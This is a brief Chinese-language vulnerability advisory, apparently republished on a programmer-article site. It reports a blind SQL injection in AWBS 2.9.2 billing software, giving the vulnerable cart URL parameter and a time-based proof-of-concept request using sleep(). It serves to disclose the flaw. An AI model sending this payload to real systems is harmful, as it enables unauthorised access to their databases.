AWBS 2.9.2 Blind SQL 注入0day
程序员文章站
2022-03-19 09:53:33
AWBS 2.9.2 Blind SQL 注入0day,大家可以参考下。... 11-03-11...
影响版本:awbs 2.9.2
官方网站:http://www.awbs.com
漏洞类型:sql注入
漏洞描述:
---vulnerability---
http(s)://[host]/cart?ca=add_other&oid=[true value]'[blind-sql]
=============================================================================================
---poc using time-based blind sql injection---
https://www.vulnerablehost.com/cart?ca=add_other&oid=1'%20and%20sleep(100)='
下一篇: 怎么用ai绘制出一个卡通猴子?